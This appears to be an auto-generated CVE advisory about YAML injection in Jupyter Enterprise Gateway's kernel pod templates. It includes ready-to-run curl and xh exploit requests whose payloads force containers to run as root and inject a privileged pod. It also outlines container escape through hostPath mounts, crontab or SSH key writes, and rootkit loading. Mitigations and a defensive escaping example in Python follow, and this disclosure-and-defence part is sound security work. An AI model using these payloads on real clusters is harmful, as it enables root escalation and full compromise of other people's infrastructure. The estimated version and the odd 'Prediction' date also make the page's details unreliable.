Intro
This vulnerability exists in Jupyter Enterprise Gateway because the server interpolates untrusted environment variables (e.g., `KERNEL_XXX`) into Kubernetes manifests without any YAML-aware escaping. The Jinja2 template `kernel-pod.yaml.j2` contains several `kernel_xxx` placeholders such as `kernel_working_dir`; these are directly replaced with values provided via the API call. An attacker can control those environment variables (originally `KERNEL_XXX` before conversion to lowercase) and inject arbitrary YAML syntax.

Because the rendering is performed line-by-line without validating or escaping YAML-special characters like newlines, quotes, or document separators, a malicious variable can break out of its intended string context. For example, injecting a double quote followed by a newline allows the attacker to close the original string, add new YAML keys, and even overwrite existing ones. In YAML, when duplicate keys occur the last occurrence wins, which enables overwriting critical fields such as `securityContext`. Moreover, by injecting `---` (document separator) and `...` (end-of-document) markers, an attacker can create multi-document YAML streams, causing the Kubernetes client to parse and apply multiple resources from a single manifest. This results in the creation of arbitrary additional resources like privileged pods, secrets, persistent volume claims, services, or config maps.

The proof-of-concept uses `KERNEL_WORKING_DIR` (when `EG_MIRROR_WORKING_DIRS` is enabled), but any of the `KERNEL_` variables is a vector. The attack is especially dangerous because it allows an unauthenticated (or low-privileged) user to escalate to root on the host node and fully compromise the Kubernetes cluster.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Jupyter Enterprise Gateway
Version: <= 3.2.1 (estimated)
Vulnerability: YAML injection
Severity: Critical
Date: 2024-12-15 (disclosure)
<h2 style="color: blue;">Prediction: 2025-01-30</h2>
<h2 style="color: blue;">What Undercode Say</h2>
Check if `EG_MIRROR_WORKING_DIRS` is enabled (default false):

```bash
curl -s http://localhost:31529/api/kernels | jq '.'
```

Exploit using xh (install: `cargo install xh`):

```bash
xh http://localhost:31529/api/kernels env:[email protected]
```

`env-working-dir-exploit.yaml` content:

```json
{ "KERNEL_POD_NAME": "working-dir-root", "KERNEL_NAMESPACE": "notebooks", "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n INJECTION\\n securityContext:\\n runAsUser: 0\\n runAsGroup: 0\\n fsGroup: 100\\n HAHA - stray quote \"" }
```

Equivalent curl command:

```bash
curl http://localhost:31529/api/kernels \
  -H 'content-type: application/json' \
  -d '{"env":{"KERNEL_POD_NAME":"working-dir-root","KERNEL_NAMESPACE":"notebooks","KERNEL_WORKING_DIR":"\"/tmp\\\"\\n\\n INJECTION\\n securityContext:\\n runAsUser: 0\\n runAsGroup: 0\\n fsGroup: 100\\n HAHA - stray quote \""}}'
```

Multi-document injection to create a new privileged pod:

```bash
cat > env-working-dir-exploit-pod.yaml <<EOF
{ "KERNEL_POD_NAME": "working-dir-root-pod", "KERNEL_NAMESPACE": "notebooks", "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n INJECTION\\n...\\n\\napiVersion: v1\\nkind: Pod\\nmetadata:\\n name: injected-pod\\n spec:\\n containers:\\n - name: injected-container\\n image: nginx\\n ports:\\n - containerPort: 80\\n securityContext:\\n privileged: true\\n runAsUser: 0\\n runAsGroup: 0\\n...\\n HAHA - stray quote\"" }
EOF
xh http://localhost:31529/api/kernels env:[email protected]
```

Verify injected resources:

```bash
kubectl get pods -n notebooks
kubectl get pod/injected-pod -n notebooks -o jsonpath='{.spec.containers[].securityContext}'
```
<h2 style="color: blue;">Exploit</h2>
1. Overwrite securityContext – Inject a duplicate `securityContext` key under the pod spec. The injected block (`runAsUser: 0`, `runAsGroup: 0`, `fsGroup: 100`) replaces the original, making the container run as root (uid 0, gid 0).
2. Create arbitrary resources – Use `---` to start a new YAML document and `...` to end the previous one. The renderer concatenates the injected YAML after the legitimate `workingDir` field, resulting in a multi‑document manifest. Kubernetes accepts each document as a separate resource, allowing an attacker to create privileged pods, persistent volumes, secrets, etc.
3. Container escape via hostPath – Combine an injected `securityContext` (root) with a `hostPath` volume mount pointing to the host’s root filesystem. Then write a cron job or SSH key on the host to gain persistent code execution on the worker node.
4. Privileged pod modules – Create a pod with `privileged: true` and load kernel modules (e.g., `insmod` a rootkit) or directly access `/dev/mem` to compromise the entire node.
Protection
- Upgrade to a patched version of Jupyter Enterprise Gateway (≥ 3.2.2) where environment variables are properly escaped or sanitized before YAML rendering.
- Disable `EG_MIRROR_WORKING_DIRS` (set to `false` or omit) to prevent `KERNEL_WORKING_DIR` from being interpolated.
- Enforce Kubernetes admission controllers (e.g., OPA/Gatekeeper, Pod Security Standards) to block pods with `runAsUser: 0`, `privileged: true`, or suspicious `hostPath` mounts.
- Restrict network access to the Enterprise Gateway API (port 31529 in the example) to trusted users only.
- Use a Web Application Firewall (WAF) or API gateway that validates JSON structure and rejects requests containing `"`, `...`, or newline characters inside environment variable values.
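The escaping and validation that the Protection items call for, shown as an added example that is not Enterprise Gateway's own code. `str.format` stands in for the Jinja2 rendering, and the template, the `SAFE_VALUE` allowlist and the sample value are constructed assumptions.

```python
import json
import re

# Constructed stand-in for the template; not the project's kernel-pod.yaml.j2.
TEMPLATE_UNSAFE = (
    "spec:\n"
    "  securityContext:\n"
    "    runAsUser: 1000\n"
    "  containers:\n"
    "  - name: kernel\n"
    '    workingDir: "{kernel_working_dir}"\n'
)
# Hardened variant: the template adds no quotes, the value arrives pre-encoded.
TEMPLATE_SAFE = TEMPLATE_UNSAFE.replace('"{kernel_working_dir}"', "{kernel_working_dir}")

# Hypothetical allowlist policy: no quotes, whitespace or control characters.
SAFE_VALUE = re.compile(r"[A-Za-z0-9._/:@-]{1,255}")
# A line consisting only of a YAML document start or end marker.
DOC_MARKER = re.compile(r"^(---|\.\.\.)\s*$", re.MULTILINE)


def render_unsafe(value: str) -> str:
    """Plain substitution, as the page describes: the value lands in the YAML verbatim."""
    return TEMPLATE_UNSAFE.format(kernel_working_dir=value)


def render_encoded(value: str) -> str:
    """Emit the value as a JSON string, which is a single-line YAML double-quoted scalar."""
    return TEMPLATE_SAFE.format(kernel_working_dir=json.dumps(value))


def structure_changed(rendered: str) -> bool:
    """A scalar substitution must never add lines or document markers to the manifest."""
    extra_lines = rendered.count("\n") != TEMPLATE_UNSAFE.count("\n")
    return extra_lines or bool(DOC_MARKER.search(rendered))


def rejected_kernel_vars(env: dict) -> list:
    """Names of KERNEL_* variables whose values fail the allowlist."""
    return sorted(name for name, value in env.items()
                  if name.startswith("KERNEL_") and not SAFE_VALUE.fullmatch(str(value)))


# Constructed sample value: closes the quoted string and adds a key on a new line.
SAMPLE = '/tmp"\n    injectedKey: true\n    note: "'
```

Rejecting requests with `rejected_kernel_vars` before rendering and checking `structure_changed` afterwards are independent layers; the encoding in `render_encoded` is what keeps the value inside its scalar.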
Impact
- An attacker can create arbitrary Kubernetes resources (Pod, Secret, PersistentVolumeClaim, PersistentVolume, Service, ConfigMap) with full control over `image`, `securityContext`, `volumeMounts`, and `hostPath`.
- Privileged pods can be spawned, allowing container escape via kernel module loading or host filesystem access.
- A `hostPath` mount combined with root privileges enables writing crontabs or scripts on the worker node, leading to host compromise.
- Repeated exploitation compromises all worker nodes and the entire Kubernetes cluster, resulting in data theft, cryptojacking, or lateral movement to other clusters.
Sources:
Reported By: github.com

